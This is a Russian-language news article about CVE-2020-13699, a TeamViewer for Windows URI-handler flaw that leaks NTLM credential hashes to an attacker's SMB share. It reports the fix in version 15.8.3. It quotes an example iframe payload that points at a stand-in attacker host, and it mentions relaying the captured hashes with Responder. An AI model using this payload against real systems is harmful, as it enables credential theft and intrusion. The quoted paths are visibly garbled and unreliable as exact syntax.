Уязвимость в TeamViewer может позволить хакерам украсть системный пароль

TeamViewer недавно устранил уязвимость высокого риска в своем настольном приложении для Windows, выпустив новую версию своего программного обеспечения, которая, если будет использована, может позволить удаленным злоумышленникам украсть ваш системный пароль и потенциально использовать его.

Что еще более тревожно, так это то, что эта атака не требует взаимодействия жертвы и может быть выполнена почти автоматически.

Для тех, кто не в курсе, TeamViewer — это популярное программное приложение, разработанное немецкой компанией TeamViewer GmbH, для удаленного управления, совместного использования рабочего стола, онлайн-встреч, веб-конференций и передачи файлов между компьютерами.

Он доступен для операционных систем Microsoft Windows, Linux, macOS, Chrome OS, Android, iOS, Windows RT, Windows Phone 8 и BlackBerry. Также возможно получить доступ к системе, работающей с TeamViewer, с помощью веб-браузера.

Серьезная уязвимость, получившая название CVE-2020-13699, была впервые обнаружена Джеффри Хофманом, исследователем безопасности из Praetorian. По словам исследователя, уязвимость заключается в том, как TeamViewer для Windows обрабатывает свои пользовательские URI (нецитируемый обработчик URI).

Эксперт обнаружил, что проблема может позволить злоумышленнику заставить программное обеспечение передать запрос аутентификации NTLM на систему злоумышленника. Другими словами, злоумышленник может заставить схему URI TeamViewer с веб-страницы обмануть установленное на системе жертвы приложение, чтобы инициировать соединение с удаленной SMB-общей папкой, принадлежащей злоумышленнику.

Это запускает процесс аутентификации SMB, который, в свою очередь, утечет имя пользователя системы и хэшированную версию пароля NTLMv2 злоумышленникам.

Чтобы успешно использовать CVE 2020-13699, злоумышленнику необходимо встроить вредоносный iframe на веб-сайт, а затем обмануть жертв, чтобы они посетили этот злонамеренно созданный URL. Как только жертвы нажмут на ссылку, TeamViewer автоматически запустит свой настольный клиент для Windows и откроет удаленную SMB-общую папку.

«Злоумышленник может встроить вредоносный iframe на веб-сайт с созданным URL (iframe src=’teamviewer10: –play \attacker-IPileake.tvs’), который запустит настольный клиент TeamViewer для Windows и заставит его открыть удаленную SMB-общую папку», — объяснил Джеффри Хофман в уведомлении.

«Windows выполнит аутентификацию NTLM при открытии SMB-общей папки, и этот запрос может быть передан (с помощью инструмента, такого как responder) для выполнения кода (или захвачен для взлома хэша).»

Эта уязвимость затрагивает «обработчики URI teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1, tvvideocall1 и tvvpn1», сказал Хофман.

После раскрытия уязвимости проект TeamViewer устранил проблему, цитируя параметры, передаваемые затронутыми обработчиками URI, например, URL:teamviewer10 Протокол “C: ogram Files (x86) eamviewer eamviewer.exe” “%1”.

Чтобы устранить уязвимость, «Мы внедрили некоторые улучшения в обработку URI, касающиеся CVE 2020-13699», — заявили в TeamViewer. «Спасибо, Джеффри Хофман из Praetorian, за ваш профессионализм и следование модели ответственного раскрытия. Мы благодарны, что вы связались с нами и смогли подтвердить исправление ваших находок в последнем релизе.»

Чтобы решить проблему, TeamViewer выпустил версию 15.8.3 и рекомендует своим пользователям немедленно обновиться до этой версии.

Также читайте - Лучшие альтернативы TeamViewer